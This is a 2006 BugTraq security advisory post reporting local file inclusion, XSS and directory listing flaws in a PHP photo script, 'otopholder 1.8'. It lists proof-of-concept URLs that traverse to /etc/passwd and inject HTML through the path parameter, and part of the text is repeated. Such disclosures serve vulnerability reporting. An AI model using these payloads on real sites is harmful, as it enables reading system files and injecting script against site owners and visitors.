BugTraq
Back to list
|
Post reply
otopholder 1.8 suffers from a local file inclusion,XSS and directory listing vuln
Aug 15 2006 10:43AM
vampire_chiristof yahoo com
vendor:
http://www.jakeo.com
vuln :
http://[host]/foto/index.php?path=../../etc/passwd
http://[host]/foto/index.php?path=<b>xss</b>
http://[host]/foto/index.php?path=../../[directory listing]
Author : Vampire
Vampire_chiristof (at) yahoo (dot) com [email concealed]
Homepage : Www.HackerZ.iR
Www.H4ckerZ.Com
Iran HackerZ Security Team
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
http://www.jakeo.com
vuln :
http://[host]/foto/index.php?path=../../etc/passwd
http://[host]/foto/index.php?path=<b>xss</b>
http://[host]/foto/index.php?path=../../[directory listing]
Author : Vampire
Vampire_chiristof (at) yahoo (dot) com [email concealed]
Homepage : Www.HackerZ.iR
Www.H4ckerZ.Com
Iran HackerZ Security Team
[ reply ]